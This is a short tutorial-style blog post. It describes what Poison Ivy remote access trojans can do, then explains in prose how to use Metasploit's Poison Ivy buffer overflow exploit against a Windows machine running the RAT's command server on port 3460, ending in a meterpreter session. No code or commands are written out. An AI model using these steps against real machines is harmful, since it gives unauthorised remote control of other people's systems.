Good Evening friends. Today we will learn about hacking Windows with PoisonIvy buffer overflow exploit. This exploit hacks a system using a vulnerability in a RAT. RAT stands for Remote Access Trojan and is a type of malware. It works when a hacker sends a malicious file to the victim and he clicks on it. When victim clicks the malicious file, it sends a connection back to the hacker’s machine. The Hacker can control the victim’s machine using command & control server. Using RAT’s, the hacker can
- Block mouses and keyboards
- Change the desktop wallpapers
- Downloads, uploads, deletes, and rename files
- Destroys hardware by overclocking
- Drop viruses and worms
- Edit Registry
- Use your internet connection to perform denial of service attacks (DoS)
- Format drives
- Steal passwords, credit card numbers
- Alter your web browser’s homepage
- Hide desktop icons, task bar and file
(Data from Wikipedia )
The picture given below should explain the scenario. More about RATs later.
You can see the command and control server of Poison Ivy RAT below . Poison Ivy is one of the popular RAT’s and many variants of it are still active. It was used in RSA SecureID attack. Poison Ivy RAT 2.1.x versions suffer from a stack buffer overflow vulnerability. Using this vulnerability, the machines running C&C server can be hacked. So here, its a case of hacker getting hacked.
We will learn more about RATS in our next howtos. But now let us see how to hack a Windows machine running a PoisonIvy C&C server with PoisonIvy buffer overflow exploit. Open Metasploit and load the exploit as shown below. The only option necessary is RHOST. As shown below, this RAT runs on port number 3460. Set the RHOST and check whether the target is vulnerable.
Now, as the target is vulnerable, set the payload and hit on Run. You should get the meterpreter on the remote machine as shown below.